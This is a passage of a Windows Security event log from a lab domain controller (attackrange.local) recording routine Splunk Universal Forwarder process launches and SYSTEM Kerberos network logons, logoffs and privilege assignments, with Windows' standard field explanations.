04/19/2021 02:55:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264199
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x143c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264200
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14d0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264201
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1130
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264203
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264202
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:55:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264204
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7C824B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:55:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264207
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D0708
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:55:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264206
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D0708
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62401
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:55:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264205
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D0708
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264209
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1808
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264208
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264210
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bd4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264211
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264212
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264214
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264213
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x56c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:56:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264217
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D404C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:56:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264216
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7D404C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62415
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:56:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264215
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7D404C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264219
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264218
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1268
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264220
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1774
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:57:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264221
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
